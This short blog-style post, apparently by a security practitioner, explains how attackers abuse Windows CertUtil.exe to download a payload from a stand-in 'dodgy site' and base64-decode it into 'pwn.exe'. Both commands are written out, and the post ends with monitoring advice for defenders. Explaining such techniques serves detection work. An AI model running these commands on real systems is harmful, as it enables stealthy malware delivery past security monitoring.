When a Threat Actor is trying to get a payload onto a box they’ll often use curl
and wget
as they’re often present on the endpoint. If they aren’t – or there’s considerations of being a little more stealthy – there’s another way to live off of the land. It’s name is CertUtil.exe. As far as I know it’s present on all modern versions of Windows.
I know what you’re thinking: CertUtil is for managing certificates, what possible use does it have to get a payload onto a box? For ‘reasons’ best left for MS to answer, CertUtil can act as a drop in replacement for wget
. Really.
CertUtil
-urlcache -f http://<my dodgy site>/remote_payload.txt local_payload.txt
This command does exactly what you think – pulling a file from site I control onto the local box. Maybe the attacker is concerned that their payload will trigger the attention of the SOC. Theres an answer for that too – base64 encoding.
CertUtil -decode local_payload.txt pwn.exe
You should be able to work this one out too. It takes the txt file I downloaded and does a base64 decode, creating my pwn.exe file.
So there you have it. A hackers Swiss army knife built into Windows. My advice to blue teams would be to monitor usage of this executable and to pay particular attention to the command arguments used with it. Thats good advice across the board: the arguments are generally more interesting than the executable. Maybe I’ll do an article on that in the future.
Until then, get downloading with CertUtil.